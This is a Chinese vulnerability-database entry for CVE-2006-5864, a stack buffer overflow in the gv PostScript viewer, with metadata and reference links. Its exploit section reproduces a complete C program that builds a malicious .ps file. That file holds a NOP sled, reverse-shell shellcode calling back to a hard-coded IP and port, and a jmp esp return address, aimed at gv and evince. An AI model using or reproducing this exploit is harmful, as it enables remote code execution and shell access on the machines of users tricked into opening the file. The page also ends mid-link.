GNU GV浏览器ps_gettext()函数栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111684 漏洞类型 缓冲区溢出
发布时间 2006-11-28 更新时间 2007-11-15
CVE编号 CVE-2006-5864 CNNVD-ID CNNVD-200611-192
漏洞平台 Linux CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2858
https://www.securityfocus.com/bid/20978
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-192
|漏洞详情
gv是X窗口系统下的PostScript和PDF文件浏览器。gv在处理PS文件中畸形的头时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。gv浏览器的ps.c文件中的ps_gettext()函数存在栈溢出漏洞,问题在于将PS文件的一些特定头(如%%DocumentMedia:)中的超长标注无条件的拷贝到了text(栈上257字节长的缓冲区),导致远程攻击者可以通过诱骗用户打开恶意的文件导致执行任意代码。
|漏洞EXP
/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow (20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
	FILE *fh;

	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		printf("%s <file.ps>\n\n", *(argv));
		printf("[-] unable to open file '%s' for writing: %s\n", *(argv+1), strerror(errno));
		exit(1);
	}

	fputs("%!PS-Adobe-3.0\n", fh);
	fputs("%%Title: hello.ps\n", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
	fputs("%%BoundingBox: 24 24 588 768\n", fh);
	fputs("%%DocumentMedia: ", fh);
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	fwrite(cb, strlen(cb), 1, fh);

	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	fwrite(jmpesp, 4, 1, fh);
	fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

	fputc('\n', fh);

	fputs("%%DocumentData: Clean7Bit\n", fh);
	fputs("%%Orientation: Landscape\n", fh);
	fputs("%%Pages: 1\n", fh);
	fputs("%%PageOrder: Ascend\n", fh);
	fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
	fputs("%%EndComments\n", fh);

	return(0);
}

// milw0rm.com [2006-11-28]
|受影响的产品
Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu L
|参考资料

来源:VU#352825
名称:VU#352825
链接:http://www.kb.cert.org/vuls/id/352825
来源:XF
名称:gnu-gv-buffer-overflow(30153)
链接:http://xforce.iss.net/xforce/xfdb/30153
来源:BID
名称:20978
链接:http://www.securityfocus.com/bid/20978
来源:BUGTRAQ
名称:20061112Re:GNUgvStackOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/451422/100/200/threaded
来源:BUGTRAQ
名称:20061109GNUgvStackOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/451057/100/0/threaded
来源:SUSE
名称:SUSE-SR:2006:026
链接:http://www.novell.com/linux/security/advisories/2006_26_sr.html
来源:VUPEN
名称:ADV-2006-4424
链接:http://www.frsirt.com/english/advisories/2006/4424
来源:DEBIAN
名称:DSA-1214
链接:http://www.debian.org/security/2006/dsa-1214
来源:GENTOO
名称:GLSA-200611-20
链接:http://security.gentoo.org/glsa/glsa-200611-20.xml
来源:SECUNIA
名称:23118
链接:http://secunia.com/advisories/23118
来源:SECUNIA
名称:23018
链接:http://secunia.com/advisories/23018
来源:SECUNIA
名称:23006
链接:http://secunia.com/advisories/23006
来源:SECUNIA
名称:22787
链接:http